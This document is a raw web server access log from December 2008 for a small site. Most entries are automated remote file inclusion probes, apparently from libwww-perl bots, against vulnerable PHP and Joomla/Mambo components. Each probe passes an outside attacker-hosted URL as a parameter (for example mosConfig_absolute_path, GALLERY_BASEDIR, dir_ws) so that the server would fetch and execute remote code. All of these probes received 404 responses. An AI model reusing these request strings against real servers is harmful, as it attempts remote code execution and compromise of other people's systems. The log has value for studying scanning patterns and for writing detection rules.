207.218.234.146 - - [08/Dec/2008:08:39:56 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:39:57 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:02 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:02 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:02 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.34.133.35 - - [08/Dec/2008:08:40:16 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.34.133.35 - - [08/Dec/2008:08:40:16 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:40:18 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:40:18 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:40:18 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:40:18 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.34.133.35 - - [08/Dec/2008:08:40:20 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.34.133.35 - - [08/Dec/2008:08:40:20 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:08:40:33 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:43 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:44 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:44 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:40:56 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:08:40:59 -0800] "GET /logs/access.log/errors.php?error=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:41:13 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:41:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:41:16 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:41:17 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:41:17 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:41:28 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:41:28 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:41:28 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:41:29 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.115 - - [08/Dec/2008:08:41:32 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.115 - - [08/Dec/2008:08:41:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:41:37 -0800] "GET /logs/access_081015.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:41:44 -0800] "GET /logs/access_080312.log//admin/index.php?o=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:41:45 -0800] "GET /admin/index.php?o=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:41:45 -0800] "GET /logs//admin/index.php?o=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:42:12 -0800] "GET /logs/access_081015.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:42:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:42:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:42:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.6.198.91 - - [08/Dec/2008:08:42:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:42:32 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:42:32 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:42:32 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:42:43 -0800] "GET /logs/access_080506.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:42:45 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.60.183 - - [08/Dec/2008:08:42:47 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:42:53 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:42:53 -0800] "GET /logs/access_080507.log//admin/index.php?o=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.186.13.202 - - [08/Dec/2008:08:43:07 -0800] "GET /logs/access_080123.log HTTP/1.1" 200 638144 "http://br.search.yahoo.com/search?p=cv+direma@terra.com.br&searchsubmit=Buscar+na+web&fr=yfp&toggle=1&ei=UTF-8&rd=r1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:43:07 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:43:17 -0800] "GET /inc/cmses/aedatingCMS2.php?dir%5binc%5d=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:43:18 -0800] "GET /logs//inc/cmses/aedatingCMS2.php?dir%5binc%5d=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:43:22 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:08:43:30 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.67.37 - - [08/Dec/2008:08:43:31 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-140.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:43:33 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:43:38 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:43:39 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:43:39 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:43:40 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:43:58 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:44:00 -0800] "GET /logs/access_080228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:08:44:03 -0800] "GET /logs/access_080107.log HTTP/1.1" 200 561463 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:44:12 -0800] "GET /logs/access_081013.log//tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:44:13 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:44:13 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:44:13 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
77.221.130.8 - - [08/Dec/2008:08:45:13 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
77.221.130.8 - - [08/Dec/2008:08:45:13 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
77.221.130.8 - - [08/Dec/2008:08:45:13 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
77.221.130.8 - - [08/Dec/2008:08:45:17 -0800] "GET /logs/access_080506.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:18 -0800] "GET /logs/access_080828.log/page.php?doc=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:18 -0800] "GET /logs/access_080521.log/page.php?doc=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:18 -0800] "GET /page.php?doc=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:18 -0800] "GET /logs/page.php?doc=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:45:25 -0800] "GET /logs/access_081114.log/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:29 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:29 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:29 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:36 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:37 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:37 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:40 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:40 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:45:41 -0800] "GET /logs/access_080703.log%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:41 -0800] "GET /logs/access_080506.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.85.198.234 - - [08/Dec/2008:08:45:52 -0800] "GET /logs/access_080506.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:06 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:06 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:46:13 -0800] "GET /logs/access_080918.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:46:13 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:46:13 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:21 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:46:21 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.114.112.155 - - [08/Dec/2008:08:46:27 -0800] "GET /about.php?option=http://www.acewaste.com.au/content/robo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.114.112.155 - - [08/Dec/2008:08:46:27 -0800] "GET /logs//about.php?option=http://www.acewaste.com.au/content/robo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.114.112.155 - - [08/Dec/2008:08:46:27 -0800] "GET /about.php?option=http://www.acewaste.com.au/content/robo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
203.114.112.155 - - [08/Dec/2008:08:46:27 -0800] "GET /logs//about.php?option=http://www.acewaste.com.au/content/robo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:46:41 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:46:41 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
218.84.44.197 - - [08/Dec/2008:08:46:44 -0800] "GET /logs/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.84.44.197 - - [08/Dec/2008:08:46:45 -0800] "GET /mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.69.73.124 - - [08/Dec/2008:08:46:46 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
212.69.73.124 - - [08/Dec/2008:08:46:46 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:08:47:27 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
